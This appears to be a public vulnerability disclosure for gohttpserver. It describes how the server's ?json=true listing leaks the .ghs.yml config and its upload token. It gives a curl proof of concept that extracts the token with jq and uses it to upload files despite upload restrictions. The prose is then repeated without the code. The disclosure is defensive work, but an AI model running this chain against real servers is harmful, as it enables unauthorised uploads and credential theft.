Disclaimer
As this project is unmaintained I need to disclose this issue publicly.
It's used in the wild (personally encountered on project I related to), here is just expose of 1 discovered problem to prevent new users from using vulnerable app
Affected versions
Any, from 0 to 1.3.0
Steps to reproduce
Setup from docs:
cat > .ghs.yml << EOF
---
upload: false
delete: false
users:
- email: "codeskyblue@codeskyblue.com"
delete: true
upload: true
token: 4567gf8asydhf293r23r
EOF
docker run -it --rm -p 8000:8000 -v $PWD:/app/public --name gohttpserver codeskyblue/gohttpserver:latest --auth-type http --auth-http username1:password1
Actual behaviour
Now you can obtain content of .ghs.yml by simple curl:
curl username1:password1@localhost:8000/?json=true
{
"auth": {
"upload": false,
"delete": false,
"users": [
{
"Email": "codeskyblue@codeskyblue.com",
"Upload": true,
"Delete": true,
"Token": "4567gf8asydhf293r23r"
}
],
"AccessTables": null
},
"files": [
{
"name": ".ghs.yml",
"path": ".ghs.yml",
"type": "file",
"size": 138,
"mtime": 1770109065474
}
]
}
It effectively allows to upload anything regardless of "upload: false" for basic auth
Simple POC:
echo "poc" > poc.txt
curl -F file=@poc.txt -F token=$(curl username1:password1@localhost:8000/?json=true | jq .auth.users[0].Token) http://username1:password1@localhost:8000/somedir
Unfortunately, this works the same way with no basic auth and token-restricted uploads (i.e. any publicly accessible server with uploads restricted by token allows unrestricted uploads)
Disclaimer
As this project is unmaintained I need to disclose this issue publicly.
It's used in the wild (personally encountered on project I related to), here is just expose of 1 discovered problem to prevent new users from using vulnerable app
Affected versions
Any, from 0 to 1.3.0
Steps to reproduce
Setup from docs:
Actual behaviour
Now you can obtain content of .ghs.yml by simple curl:
It effectively allows to upload anything regardless of "upload: false" for basic auth
Simple POC:
Unfortunately, this works the same way with no basic auth and token-restricted uploads (i.e. any publicly accessible server with uploads restricted by token allows unrestricted uploads)